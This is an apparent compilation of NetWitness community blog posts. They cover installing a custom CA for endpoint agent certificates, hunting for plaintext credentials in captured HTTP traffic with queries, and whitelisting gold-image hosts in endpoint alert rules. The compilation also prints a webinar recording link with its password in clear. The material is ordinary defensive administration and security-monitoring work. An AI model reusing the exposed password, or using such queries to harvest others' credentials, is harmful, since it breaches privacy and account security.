The endstate format that we'll need for everything will be PEM. The single server and/or client cert should look like this:

-----BEGIN CERTIFICATE-----
MIIFODCCAyCgAwIBAgICEAEwDQYJKoZIhvcNAQELBQAwEjEQMA4GA1UEAwwHUm9v
dC1jYTAeFw0yMDA4MDUyMDE0MTdaFw0zMDA4MDMyMDE0MTdaMCUxIzAhBgNVBAMM
....snip....
-----END CERTIFICATE-----

 

The private key should look like this:

-----BEGIN PRIVATE KEY-----
MIIJQwIBADANBgkqhkiG9w0BAQEFAASCCS0wggkpAgEAAoICAQCuUtxhFPb+FtWD
mQyIELpYVW7isU2KA7ur6ZhWDnKI6pD1POYHfyftO6MhxYsaRrwQ+XxhRJhyT/Ht
....snip....
-----END PRIVATE KEY-----

 

And the Certificate Chain should look this (one BEGIN-END block per CA certificate in the chain...also, it will help to simplify the rest of the process if this chain only includes CA certificates):

-----BEGIN CERTIFICATE-----
MIIFODCCAyCgAwIBAgICEAEwDQYJKoZIhvcNAQELBQAwEjEQMA4GA1UEAwwHUm9v
dC1jYTAeFw0yMDA4MDUyMDE0MTdaFw0zMDA4MDMyMDE0MTdaMCUxIzAhBgNVBAMM
....snip....
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIIFBzCCAu+gAwIBAgIJAK5iXOLV5WZQMA0GCSqGSIb3DQEBCwUAMBIxEDAOBgNV
BAMMB1Jvb3QtY2EwHhcNMjAwODA1MTk1MTMxWhcNMzAwODAzMTk1MTMxWjASMRAw
....snip....
-----END CERTIFICATE-----

 

We want to make sure we have each of these PEM files for both the server and client certs and key we generated. Once we have these, we can proceed to the next set of steps.

 

The rest of this process will assume that all of these certificates, keys, and chains are staged on the Endpoint Log Hybrid host.

Every command we run from this point forward occurs on the Endpoint Log Hybrid.

We end up replacing a number of different files on this host, so you should also consider backup all the affected files before running the following commands.

 

For the server certificates:

  • # cp /path/to/server/certificate.pem /etc/pki/nw/web/endpoint-web-server-cert.pem
  • # cp /path/to/server/key.pem /etc/pki/nw/web/endpoint-web-server-key.pem
  • # cat /path/to/server/certificate.pem > /etc/pki/nw/web/endpoint-web-server-cert.chain
  • # cat /path/to/ca/chain.pem >> /etc/pki/nw/web/endpoint-web-server-cert.chain
  • # openssl crl2pkcs7 -nocrl -certfile /path/to/server/certificate.pem -certfile /path/to/ca/chain.pem -out /etc/pki/nw/web/endpoint-web-server-cert.p7b
  • # cp /path/to/ca/chain.pem /etc/pki/nw/nwe-trust/truststore.pem
  • # cp /path/to/ca/chain.pem /etc/pki/nw/nwe-ca/customrootca-cert.pem
  • # echo "/etc/pki/nw/nwe-ca/customrootca-cert.pem" > /etc/pki/nw/nwe-trust/truststore.p12.idx
  • # echo "/etc/pki/nw/nwe-ca/customrootca-cert.pem" > /etc/pki/nw/nwe-trust/truststore.pem.idx

 

The end results, with all the files we modified and replaced, should be:

 

Once we're confident we've completed these steps, run:

  • # systemctl restart nginx

 

We can verify that everything so far has worked by browsing to https://<endpoint_server_IP_or_FQDN> and checking the certificate presented by the server:

 

If this matches our server certificate and chain, then we can move on to the client certificates. If not, then we need to go back and figure out which step we did wrong.

 

For the client certificates:

  • openssl pkcs12 -export -out client.p12 -in /path/to/client/certificate.pem -inkey /path/to/client/key.pem -certfile /path/to/ca/chain.pem

 

...enter a password for the certificate bundle, and then SCP this client.p12 bundle onto a windows host. We'll come back to it in just a moment.

 

In the NetWitness UI, browse to Admin/Services --> Endpoint-Server --> Config --> Agent Packager tab. Change or validate any of the configurations you need, and then click "Generate Agent Packager." The Certificate Password field here is required to download the packager, but we won't be using the OOTB client certificate at all so don't stress about the password.

 

Unzip this packager onto the same windows host that has the client.p12 bundle we generated previously. Next, browse to the AgentPackager\config directory, replace the OOTB client.p12 file with the our custom-made client.p12 bundle, move back up up one directory, and run the AgentPackager.exe.

 

If our client.p12 bundle has been created correctly, then in the window that opens, we will be prompted for a password. This is the password we used when we ran the openssl pkcs12 command above, not the password we used in the UI to generate the packager. If they happen to be the same, fantastic....

 

We'll want to verify that the Client certificate and Root CA certificate thumbprints here match with our custom generated certificates.

 

With our newly generated agent installers, it is now time to test them. Pick a host in your org, run the appropriate agent installer, and then verify that you see the agent showing up in your UI at Investigate/Hosts.

 

If it does appear, congratulations! Make sure to record all these changes, and be ready to repeat them when certificates expire and agent installers need upgrading/updating.

 

If it doesn't, a couple things to check:

  • first, give it a couple minutes...it's not going to show up instantly
  • go back through all these steps and double-check that everything is correct
  • check the c:\windows\temp directory for a log file with the same name as your endpoint agent; e.g.: NWEAgent.log....if there are communication errors between the agent/host and the endpoint server, this log will likely have relevant troubleshooting details
  • if the agent log file has entries showing both "AgentCert" and "KnownServerCert" values, check that these thumbprints match the Client and Root CA certificate thumbprints from the AgentPackager output

    • ...I was not able to consistently reproduce this issue, but it is related to how the certs and keys are bundled together in the client.p12
    • ...when this happened to me, I imported my custom p12 bundle into the Windows MMC Certificates snap-in, and then exported it (make sure that the private key gets both imported and exported, as well as all the CAs in the chain), then re-ran my AgentPackger with this exported client.p12, and it fixed the error
    • ... ¯\_(ツ)_/¯
  • from a cmd prompt on the host, run c:\windows\system32\<service name of the agent>.exe /testnet
  • check the NGINX access log on the Endpoint Log Hybrid; along with the agent log file on the endpoint, this can show whether the agent and/or server are communication properly
    # tail -f /var/log/nginx/access.log

By default, NetWitness Endpoint 11.x creates a self-signed Certificate Authority during its initial installation, and uses this CA to generate certificates for the endpoint agent and the local reverse proxy that handles all incoming agent communications. Because all these certificates are generated from the same CA chain, they automatically trust each other and enable seamless, easy, and secure communications between agents and the endpoint server.

 

But what if this self-signed CA cannot be used within your organization? For a number of very valid reasons, many orgs might not allow software using a self-signed certificate, and may instead be required to use their own trusted CAs. If this is the case, we have a couple options - an easy way, and a hard way.

 

This blog covers the easy way.

 

The only real requirement for the easy way is that we are able to create an Intermediate CA certificate and its private key from our CA chain (or use an existing pair), and that this Intermediate CA is allowed to generate an additional, subordinate CA under it.

 

For my testing, "Root-ca" was my imaginary company's Root CA, and I created "My Company Intermediate CA" for use in my 11.4 Endpoint Log Hybrid.

 

(I'm no expert in certificates, but I can say that all the Intermediate CAs I created that had explicit extendedKeyUsage extensions failed. The only Intermediate CAs I could get to work included "All" of the Intended Purposes. If you know more about CAs and the specific extendedKeyUsage extensions needed for a CA to be able to create subordinate CAs, I'd be interested to know what they are.)

 

Once we have an Intermediate CA certificate and its private key, we need to make sure they are in PEM format. There are a number of ways to convert and check keys and certificates, and a whole bunch of resources online to help with this this, so I won't cover any of the various conversion commands or methods here. 

 

If the CA certificate looks like this, then it is most likely in the correct format:

-----BEGIN CERTIFICATE-----
MIIFODCCAyCgAwIBAgICEAEwDQYJKoZIhvcNAQELBQAwEjEQMA4GA1UEAwwHUm9v
dC1jYTAeFw0yMDA4MDUyMDE0MTdaFw0zMDA4MDMyMDE0MTdaMCUxIzAhBgNVBAMM
....snip....
-----END CERTIFICATE-----

 

And if the private key looks like this, then it is most likely in the correct format:

-----BEGIN PRIVATE KEY-----
MIIJQwIBADANBgkqhkiG9w0BAQEFAASCCS0wggkpAgEAAoICAQCuUtxhFPb+FtWD
mQyIELpYVW7isU2KA7ur6ZhWDnKI6pD1POYHfyftO6MhxYsaRrwQ+XxhRJhyT/Ht
....snip....
-----END PRIVATE KEY-----

 

Our last step in this process has to occur at a very specific point during the endpoint log hybrid's installation - after we have run the nwsetup-tui command and the host has been enabled within the NetWitness UI, but before we install the Endpoint Log Hybrid services:

  • on the endpoint host, create directory /etc/pki/nw/nwe-ca
  • place the CA certificate and CA private key files in this directory and name them nwerootca-cert.pem and nwerootca-key.pem, respectively

 

The basis for this process comes directly from the "Configure Multiple Endpoint Log Hybrid Hosts" step in the Post Installation tasks guide (https://community.rsa.com/docs/DOC-101660#NetWitne), if we want a bit more context or details on when this step should occur and how to do it properly.

 

Once we've done this, we can now install the Endpoint Log Hybrid services on the host.

 

I suggest you watch the installation log file on the endpoint server, because if the Intermediate CA does not have all the necessary capabilities, the installation will fail and this log file can help us identify which step (if my own experience is any guide, then it will most likely fail during the attempt to create the subordinate Endpoint Intermediate CA --> /etc/pki/nw/nwe-ca/esca-cert.pem):

# tail -f /var/log/netwitness/config-management/chef-solo.log

 

If all goes well, we'll be able to check that our endpoint-server is using our Intermediate CA by browsing to https://<endpoint_server_IP_or_FQDN> and checking the certificate presented by the server:

 

And our client.p12 certificate bundle within the agentPackager will be generated from the same chain:

 

And that's it!

 

Any agent packages we generate from this point forward will use the client.p12 certificates generated from our CA. Likewise, all agent-server communications will be encrypted with the certificates generated from our CA.

Thank you for joining us for the July 22nd NetWitness Webinar covering Data Carving using Logs as presented by Leonard Chvilicek. An edited recording is available below, with the Zoom link to the original webinar recording.

 

 

https://Dell.zoom.us/rec/share/9ddSC-v1qVxITbeS5hreSJY6AZnFeaa8hyEe-fYKxEvYejAP3hl67DCXZUjQGil6

Password: V0.*h5#v

This article applies to hunting with Netwitness for Networks (packet-based). Before proceeding, it is important that you are aware of any GDPR or other applicable data collection regulations which will not be covered here.

 

Hunting for plaintext credentials is an important and easy method of finding policy violations or other enablers of compromise. Increasing numbers of the workforce in remote or work-from-home situations means that employees will be transferring data over infrastructure not controlled by your organization. This may include home WiFi, mobile hotspots, or coffee shop free WiFi.

 

Frequently, this hunting method will reveal misconfigured web servers, poor authentication handling, or applications using baked-in URLs and credentials. While Netwitness does a good job parsing this by default, there are additional steps that can be taken to increase detection and parsing.

 

Key Takeaways

  • Ensure the Form_Data_lua parser is enabled and updated
  • Also hunt for sessions where passwords are not parsed

 

Setup

Most environments will have either the HTTP or HTTP_lua parser currently enabled considering that it is one of the core network parsers. You can check this under your Decoder > Config tab in the Parsers Configuration pane. More details about system parsers and Lua equivalents can be found here: https://community.rsa.com/docs/DOC-79198

 

Form_Data_lua

This parser looks at the body of HTTP content whereas the HTTP/HTTP_lua parsers primarily extract credentials from the headers. Before enabling Form_Data_lua, it is important to understand that this can come with increased resource usage due to the amount of additional data being searched.  You can find statistic monitoring instructions here, although this itself can come with a performance impact as well: https://community.rsa.com/docs/DOC-80210

 

For the purpose of this hunting method, you can disable the “query” meta key if there are resource concerns. In either case, be sure to monitor keys for index overflow. You can adjust the per-key valueMax if needed per the Core Database Tuning Guide: https://community.rsa.com/docs/DOC-81117

 

Also, if you are not subscribed to and deploying the Form_Data_lua parser, be sure to deploy the latest copy from Live. Along with optimizations, recent changes expand the variables that the parser is searching for, as well as introduce parsing of JSON-based authentication.

 

Hunting

Once the parsers are enabled, you can go to Investigate > Navigate and begin a new query. For ease of record keeping, I like to structure my hunt in these categories:

  • Inbound
    • Password exists
    • Password does not exist
  • Lateral
    • Password exists
    • Password does not exist
  • Outbound
    • Password exists
    • Password does not exist

 

The assumption here is that you’re using the Traffic_Flow_lua parser with updated network definitions to easily identify directionality. If not, you can use other keys such as ip.src and ip.dst. More info on the Traffic_Flow_lua parser here: https://community.rsa.com/docs/DOC-44948

 

Querying where passwords exist is straightforward:

password exists && direction = “inbound” && service = 80
password exists && direction = “lateral” && service = 80
password exists && direction = “outbound” && service = 80

 

Querying where passwords do not exist requires a bit of creativity and assumptions. In many cases, authentication over HTTP will involve URLs similar to http[:]//host[.]com/admin/formLogin. This path is recorded in the directory and filename meta keys, where “/admin/” would be the directory and “formlogin” would be the filename.

 

I’ll often start with the below query (the exclamation point is used to negate “exists”):

password !exists && direction = “outbound” && service = 80 && filename contains “login”,”logon”,”auth”

 

You can follow this pattern for other directions, filenames, and directory names as you see fit. The comma-separated strings in the filename query act as a logical OR. It would be equivalent to the following. Pay attention to the parentheses:

password !exists && direction = “outbound” && service = 80 && (filename contains “login” || filename contains ”logon” || filename contains ”auth”)

 

Many authentication sessions will occur using the “POST” HTTP method. If you’d like, you can also append ‘action = “post”’ to the above query.

 

Analysis

After your query completes, you’ll be left with a dataset to review. (Hopefully) Not all of them will contain credentials, but this is where the human analysis begins. Choose a place to start, then open the Event Analysis view (now known simply as Event view in newer versions). My example here will be heavily censored for the purpose of this blog post.

Choose the “Decode Selected Text” option to make viewing this easier.

Now that you’ve found sessions of interest, you can begin appropriate follow-up action. Examples may include advising the website developer to enable HTTPS or discussing app configuration with your mobile appliance team.

 

Conclusion

This hunting method will aid in analyzing security posture from outbound, inbound, and lateral angles. It also serves as an easy gateway for analysts to quickly make a positive security impact as well as become familiar with the intricacies of HTTP communication.

 

Netwitness parsers must balance performance considerations alongside detection fidelity. While they currently have good coverage, it’s beneficial to know how to search data that is structured in a way that is malformed or formatted such that it is impractical for Netwitness to parse.

 

For more hunting ideas, see the Netwitness Hunting Guide: https://community.rsa.com/docs/DOC-62341

 

If you have any comments, feel free to leave them below. If you’re finding recurring patterns in your environment that are not parsed, you can let us know and we’ll assess the feasibility of adding the detection to the parser.

A question has come up a few times on how someone could exclude certain machines from triggering NetWitness Endpoint Agent alerts easily.

 

This particular use case were their "Gold Images" which are used for deploying machines.  As part of a bigger vision for other server roles & rules, a custom meta key was created called Server.Role to hold the various roles they have defined for servers in their environment.

 

A Custom Feed was created to associate "Gold Image" as a meta value for that Meta Key by matching against alias.host, device.host or host.src. This example is just an Adhoc feed, but a recurring feed from a CMDB or other tools could be leveraged to keep this list dynamic.

note: My example has not gold just to contrast the roles.

 

Now that the meta values are created, we can use these as whitelisting statements for the App rules.

From Admin>Services, select the Endpoint Log Decoder, click View>Config then select the App Rules tab.

 

Filter by nwendpoint to find the endpoint rules.

Edit the rule you'd like and add a server.role != 'gold image' && in front of the rule as shown in the example below:

Click OK then Apply the rules


Repeat for any other rules you would need whitelisted.

 

This is just a simple example, but you can use this approach for many other scenarios.

Filter Blog

By date: By tag: